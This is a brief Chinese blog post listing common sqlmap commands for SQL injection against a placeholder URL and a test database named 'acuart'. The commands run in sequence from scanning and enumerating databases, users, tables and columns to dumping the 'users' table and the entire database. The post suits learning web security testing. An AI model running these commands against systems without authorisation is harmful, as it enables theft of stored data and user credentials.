Sqlmap 快速使用说明
Published on 2017 - 09 - 13
最近在研究web安全,发现了大量好用的工具,可以节省很多时间,下面记录几条常用的sqlmap命令
开始扫描
python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1"
显示数据库版本
python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --dbs
显示数据库用户列表
python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --users
显示当前在用的数据库和用户
python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --current-db --current-user
查看指定数据库的数据表
python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --tables -D "acuart"
查看指定列表的字段
python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --columns -T "users" -D "acuart"
计算列表中共有多少条数据
python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --count -T "users" -D "acuart"
到处指定表中的数据
python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --dump -T "users" -D "acuart"
到处指定行的数据
python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --dump -T "users" -D "acuart" --start 2 --stop 3
导出数据库中所有表的数据
python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --dump-all -D "acuart"
关于继续进行下一步注入,我会在以后专门写个文章出来详细讲解~